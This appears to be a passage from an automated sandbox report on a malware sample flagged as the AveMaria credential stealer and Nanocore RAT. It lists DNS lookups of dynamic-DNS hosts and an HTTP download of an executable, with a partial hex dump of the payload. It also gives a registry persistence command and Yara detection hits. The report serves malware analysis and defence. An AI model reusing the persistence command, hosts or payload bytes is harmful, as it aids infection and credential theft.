                        Aug 2, 2021 10:16:55.221283913 CEST53601008.8.8.8192.168.2.3
                        Aug 2, 2021 10:16:55.924659967 CEST5319553192.168.2.38.8.8.8
                        Aug 2, 2021 10:16:55.951212883 CEST53531958.8.8.8192.168.2.3
                        Aug 2, 2021 10:16:57.101675987 CEST5014153192.168.2.38.8.8.8
                        Aug 2, 2021 10:16:57.137480021 CEST53501418.8.8.8192.168.2.3
                        Aug 2, 2021 10:16:58.194892883 CEST5302353192.168.2.38.8.8.8
                        Aug 2, 2021 10:16:58.222788095 CEST53530238.8.8.8192.168.2.3
                        Aug 2, 2021 10:16:58.970942020 CEST4956353192.168.2.38.8.8.8
                        Aug 2, 2021 10:16:59.006326914 CEST53495638.8.8.8192.168.2.3
                        Aug 2, 2021 10:16:59.788985968 CEST5135253192.168.2.38.8.8.8
                        Aug 2, 2021 10:16:59.817873955 CEST53513528.8.8.8192.168.2.3
                        Aug 2, 2021 10:17:00.476982117 CEST5934953192.168.2.38.8.8.8
                        Aug 2, 2021 10:17:00.503283024 CEST53593498.8.8.8192.168.2.3
                        Aug 2, 2021 10:17:01.171550035 CEST5708453192.168.2.38.8.8.8
                        Aug 2, 2021 10:17:01.197033882 CEST53570848.8.8.8192.168.2.3
                        Aug 2, 2021 10:17:01.892528057 CEST5882353192.168.2.38.8.8.8
                        Aug 2, 2021 10:17:01.920002937 CEST53588238.8.8.8192.168.2.3
                        Aug 2, 2021 10:17:02.539330006 CEST5756853192.168.2.38.8.8.8
                        Aug 2, 2021 10:17:02.575206995 CEST53575688.8.8.8192.168.2.3
                        Aug 2, 2021 10:17:03.384495974 CEST5054053192.168.2.38.8.8.8
                        Aug 2, 2021 10:17:03.412496090 CEST53505408.8.8.8192.168.2.3
                        Aug 2, 2021 10:17:27.381014109 CEST5436653192.168.2.38.8.8.8
                        Aug 2, 2021 10:17:27.414448977 CEST53543668.8.8.8192.168.2.3
                        Aug 2, 2021 10:17:28.106956959 CEST5303453192.168.2.38.8.8.8
                        Aug 2, 2021 10:17:28.141330004 CEST53530348.8.8.8192.168.2.3
                        Aug 2, 2021 10:17:46.512516975 CEST5776253192.168.2.38.8.8.8
                        Aug 2, 2021 10:17:46.556118965 CEST53577628.8.8.8192.168.2.3
                        Aug 2, 2021 10:17:46.629009962 CEST5543553192.168.2.38.8.8.8
                        Aug 2, 2021 10:17:46.665653944 CEST53554358.8.8.8192.168.2.3
                        Aug 2, 2021 10:17:47.187045097 CEST5071353192.168.2.38.8.8.8
                        Aug 2, 2021 10:17:47.228749990 CEST53507138.8.8.8192.168.2.3
                        Aug 2, 2021 10:17:47.507148981 CEST5613253192.168.2.38.8.8.8
                        Aug 2, 2021 10:17:47.547542095 CEST53561328.8.8.8192.168.2.3
                        Aug 2, 2021 10:18:02.015377998 CEST5898753192.168.2.38.8.8.8
                        Aug 2, 2021 10:18:02.062906027 CEST53589878.8.8.8192.168.2.3
                        Aug 2, 2021 10:18:05.265970945 CEST5657953192.168.2.38.8.8.8
                        Aug 2, 2021 10:18:05.329832077 CEST53565798.8.8.8192.168.2.3
                        Aug 2, 2021 10:18:17.409890890 CEST6063353192.168.2.38.8.8.8
                        Aug 2, 2021 10:18:17.547638893 CEST53606338.8.8.8192.168.2.3
                        Aug 2, 2021 10:18:24.000056982 CEST6129253192.168.2.38.8.8.8
                        Aug 2, 2021 10:18:24.032999039 CEST53612928.8.8.8192.168.2.3
                        Aug 2, 2021 10:18:30.012474060 CEST6361953192.168.2.38.8.8.8
                        Aug 2, 2021 10:18:30.047801971 CEST53636198.8.8.8192.168.2.3
                        Aug 2, 2021 10:18:36.294145107 CEST6493853192.168.2.38.8.8.8
                        Aug 2, 2021 10:18:36.327006102 CEST53649388.8.8.8192.168.2.3
                        Aug 2, 2021 10:18:37.690383911 CEST6194653192.168.2.38.8.8.8
                        Aug 2, 2021 10:18:37.722863913 CEST53619468.8.8.8192.168.2.3
                        Aug 2, 2021 10:18:40.352721930 CEST6491053192.168.2.38.8.8.8
                        Aug 2, 2021 10:18:40.393965960 CEST53649108.8.8.8192.168.2.3
                        Aug 2, 2021 10:18:43.063059092 CEST5212353192.168.2.38.8.8.8
                        Aug 2, 2021 10:18:43.096067905 CEST53521238.8.8.8192.168.2.3
                        Aug 2, 2021 10:18:49.128809929 CEST5613053192.168.2.38.8.8.8
                        Aug 2, 2021 10:18:49.273305893 CEST53561308.8.8.8192.168.2.3
                        Aug 2, 2021 10:18:54.231587887 CEST5633853192.168.2.38.8.8.8
                        Aug 2, 2021 10:18:54.266047955 CEST53563388.8.8.8192.168.2.3
                        Aug 2, 2021 10:19:01.357726097 CEST5942053192.168.2.38.8.8.8
                        Aug 2, 2021 10:19:01.393486023 CEST53594208.8.8.8192.168.2.3
                        Aug 2, 2021 10:19:08.561073065 CEST5878453192.168.2.38.8.8.8
                        Aug 2, 2021 10:19:08.594361067 CEST53587848.8.8.8192.168.2.3

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Aug 2, 2021 10:17:46.512516975 CEST192.168.2.38.8.8.80x571dStandard query (0)sdafsdffssffs.ydns.euA (IP address)IN (0x0001)
                        Aug 2, 2021 10:17:47.507148981 CEST192.168.2.38.8.8.80x1584Standard query (0)hutyrtit.ydns.euA (IP address)IN (0x0001)
                        Aug 2, 2021 10:18:17.409890890 CEST192.168.2.38.8.8.80xd5abStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                        Aug 2, 2021 10:18:24.000056982 CEST192.168.2.38.8.8.80x2bd8Standard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                        Aug 2, 2021 10:18:30.012474060 CEST192.168.2.38.8.8.80x8265Standard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                        Aug 2, 2021 10:18:36.294145107 CEST192.168.2.38.8.8.80x126cStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                        Aug 2, 2021 10:18:43.063059092 CEST192.168.2.38.8.8.80xb4fStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                        Aug 2, 2021 10:18:49.128809929 CEST192.168.2.38.8.8.80xecfaStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                        Aug 2, 2021 10:18:54.231587887 CEST192.168.2.38.8.8.80xca75Standard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                        Aug 2, 2021 10:19:01.357726097 CEST192.168.2.38.8.8.80x87e9Standard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                        Aug 2, 2021 10:19:08.561073065 CEST192.168.2.38.8.8.80xc1bdStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Aug 2, 2021 10:17:46.556118965 CEST8.8.8.8192.168.2.30x571dNo error (0)sdafsdffssffs.ydns.eu203.159.80.186A (IP address)IN (0x0001)
                        Aug 2, 2021 10:17:47.547542095 CEST8.8.8.8192.168.2.30x1584No error (0)hutyrtit.ydns.eu203.159.80.165A (IP address)IN (0x0001)
                        Aug 2, 2021 10:18:17.547638893 CEST8.8.8.8192.168.2.30xd5abNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                        Aug 2, 2021 10:18:24.032999039 CEST8.8.8.8192.168.2.30x2bd8No error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                        Aug 2, 2021 10:18:30.047801971 CEST8.8.8.8192.168.2.30x8265No error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                        Aug 2, 2021 10:18:36.327006102 CEST8.8.8.8192.168.2.30x126cNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                        Aug 2, 2021 10:18:43.096067905 CEST8.8.8.8192.168.2.30xb4fNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                        Aug 2, 2021 10:18:49.273305893 CEST8.8.8.8192.168.2.30xecfaNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                        Aug 2, 2021 10:18:54.266047955 CEST8.8.8.8192.168.2.30xca75No error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                        Aug 2, 2021 10:19:01.393486023 CEST8.8.8.8192.168.2.30x87e9No error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                        Aug 2, 2021 10:19:08.594361067 CEST8.8.8.8192.168.2.30xc1bdNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • hutyrtit.ydns.eu

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.349730203.159.80.16580C:\ProgramData\images.exe
                        TimestampkBytes transferredDirectionData
                        Aug 2, 2021 10:17:47.600322962 CEST1618OUTGET /microC.exe HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                        Host: hutyrtit.ydns.eu
                        Connection: Keep-Alive
                        Aug 2, 2021 10:17:47.632756948 CEST1619INHTTP/1.1 200 OK
                        Content-Type: application/octet-stream
                        Last-Modified: Mon, 02 Aug 2021 07:13:53 GMT
                        Accept-Ranges: bytes
                        ETag: "382415f36d87d71:0"
                        Server: Microsoft-IIS/8.5
                        Date: Mon, 02 Aug 2021 08:17:47 GMT
                        Content-Length: 1378816
                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 31 9b 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 2e 14 00 00 da 00 00 00 00 00 00 06 4c 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 4b 14 00 4f 00 00 00 00 60 14 00 20 d6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 15 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 2c 14 00 00 20 00 00 00 2e 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 d6 00 00 00 60 14 00 00 d8 00 00 00 30 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 08 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 4b 14 00 00 00 00 00 48 00 00 00 02 00 05 00 90 30 01 00 64 ab 02 00 03 00 00 00 73 01 00 06 f4 db 03 00 c0 6f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1d 00 00 0a 2a 26 00 02 28 1e 00 00 0a 00 2a ce 73 1f 00 00 0a 80 01 00 00 04 73 20 00 00 0a 80 02 00 00 04 73 21 00 00 0a 80 03 00 00 04 73 22 00 00 0a 80 04 00 00 04 73 23 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 24 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 31 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 37 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 3f 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 45 00 00 70 7e 07 00 00 04 6f 2d 00
                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL1aP.L `@ `@KO` @ H.text, . `.rsrc `0@@.reloc@@BKH0dso(*&(*ss s!s"s#*0~o$+*0~o%+*0~o&+*0~o'+*0~o(+*0<~(),!rp(*o+s,~+*0~+*"*0&(r1p~o-(.t$+*0&(r7p~o-(.t$+*0&(r?p~o-(.t$+*0&(rEp~o-


                        Code Manipulations

                        Statistics

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Start time:10:16:58
                        Start date:02/08/2021
                        Path:C:\Users\user\Desktop\Xjf4yH9N2t.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Users\user\Desktop\Xjf4yH9N2t.exe'
                        Imagebase:0x970000
                        File size:1309184 bytes
                        MD5 hash:2318B60075E442CB6141535E268E4DF0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Reputation:low

                        General

                        Start time:10:17:16
                        Start date:02/08/2021
                        Path:C:\Users\user\Desktop\Xjf4yH9N2t.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Users\user\Desktop\Xjf4yH9N2t.exe
                        Imagebase:0x80000
                        File size:1309184 bytes
                        MD5 hash:2318B60075E442CB6141535E268E4DF0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        General

                        Start time:10:17:17
                        Start date:02/08/2021
                        Path:C:\Users\user\Desktop\Xjf4yH9N2t.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Users\user\Desktop\Xjf4yH9N2t.exe
                        Imagebase:0xf0000
                        File size:1309184 bytes
                        MD5 hash:2318B60075E442CB6141535E268E4DF0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        General

                        Start time:10:17:17
                        Start date:02/08/2021
                        Path:C:\Users\user\Desktop\Xjf4yH9N2t.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\Desktop\Xjf4yH9N2t.exe
                        Imagebase:0x760000
                        File size:1309184 bytes
                        MD5 hash:2318B60075E442CB6141535E268E4DF0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.248863856.0000000000FD9000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000007.00000003.248863856.0000000000FD9000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: AveMaria_WarZone, Description: unknown, Source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, Author: unknown
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.248772250.0000000000FD5000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000007.00000003.248772250.0000000000FD5000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.248878230.0000000000FD9000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000007.00000003.248878230.0000000000FD9000.00000004.00000001.sdmp, Author: Joe Security
                        Reputation:low

                        General

                        Start time:10:17:20
                        Start date:02/08/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
                        Imagebase:0xbd0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:10:17:20
                        Start date:02/08/2021
                        Path:C:\ProgramData\images.exe
                        Wow64 process (32bit):true
                        Commandline:C:\ProgramData\images.exe
                        Imagebase:0xb30000
                        File size:1309184 bytes
                        MD5 hash:2318B60075E442CB6141535E268E4DF0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 20%, ReversingLabs
                        Reputation:low

                        General

                        Start time:10:17:20
                        Start date:02/08/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6b2800000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:10:17:21
                        Start date:02/08/2021
                        Path:C:\Windows\SysWOW64\reg.exe
                        Wow64 process (32bit):true
                        Commandline:REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
                        Imagebase:0xdd0000
                        File size:59392 bytes
                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:10:17:39
                        Start date:02/08/2021
                        Path:C:\ProgramData\images.exe
                        Wow64 process (32bit):true
                        Commandline:C:\ProgramData\images.exe
                        Imagebase:0x5a0000
                        File size:1309184 bytes
                        MD5 hash:2318B60075E442CB6141535E268E4DF0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.295297154.0000000000E24000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000016.00000003.295297154.0000000000E24000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.295398863.0000000000E28000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000016.00000003.295398863.0000000000E28000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: AveMaria_WarZone, Description: unknown, Source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, Author: unknown
                        Reputation:low

                        General

                        Start time:10:17:41
                        Start date:02/08/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\System32\cmd.exe
                        Imagebase:0xbd0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:10:17:42
                        Start date:02/08/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6b2800000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:10:17:49
                        Start date:02/08/2021
                        Path:C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Users\user\AppData\Roaming\KetqqsbuJ.exe'
                        Imagebase:0xa30000
                        File size:1378816 bytes
                        MD5 hash:8FA8F52DFC55D341300EFF8E4C44BA33
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 20%, ReversingLabs
                        Reputation:low

                        General

                        Start time:10:17:55
                        Start date:02/08/2021
                        Path:C:\Windows\System32\drivers\rdpvideominiport.sys
                        Wow64 process (32bit):false
                        Commandline:
                        Imagebase:0x7ff7488e0000
                        File size:30616 bytes
                        MD5 hash:0600DF60EF88FD10663EC84709E5E245
                        Has elevated privileges:
                        Has administrator privileges:
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Start time:10:17:56
                        Start date:02/08/2021
                        Path:C:\Windows\System32\drivers\rdpdr.sys
                        Wow64 process (32bit):
                        Commandline:
                        Imagebase:
                        File size:182784 bytes
                        MD5 hash:52A6CC99F5934CFAE88353C47B6193E7
                        Has elevated privileges:
                        Has administrator privileges:
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Start time:10:17:57
                        Start date:02/08/2021
                        Path:C:\Windows\system32\drivers\tsusbhub.sys
                        Wow64 process (32bit):
                        Commandline:
                        Imagebase:
                        File size:126464 bytes
                        MD5 hash:3A84A09CBC42148A0C7D00B3E82517F1
                        Has elevated privileges:
                        Has administrator privileges:
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Start time:10:18:13
                        Start date:02/08/2021
                        Path:C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
                        Imagebase:0x4f0000
                        File size:1378816 bytes
                        MD5 hash:8FA8F52DFC55D341300EFF8E4C44BA33
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.483249527.0000000006C70000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.483249527.0000000006C70000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.483194992.0000000006C40000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.483194992.0000000006C40000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.483125552.0000000006C10000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.483125552.0000000006C10000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.482686729.00000000060A0000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.482686729.00000000060A0000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.482161790.0000000005280000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.482161790.0000000005280000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.483106332.0000000006C00000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.483106332.0000000006C00000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.483164345.0000000006C30000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.483164345.0000000006C30000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000028.00000002.476683090.0000000002CA1000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.483052985.0000000006AB0000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.483052985.0000000006AB0000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.483212056.0000000006C50000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.483212056.0000000006C50000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: NanoCore, Description: unknown, Source: 00000028.00000002.480758507.0000000003F8D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.482070499.0000000005160000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.482070499.0000000005160000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: NanoCore, Description: unknown, Source: 00000028.00000002.477157085.0000000002D0B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
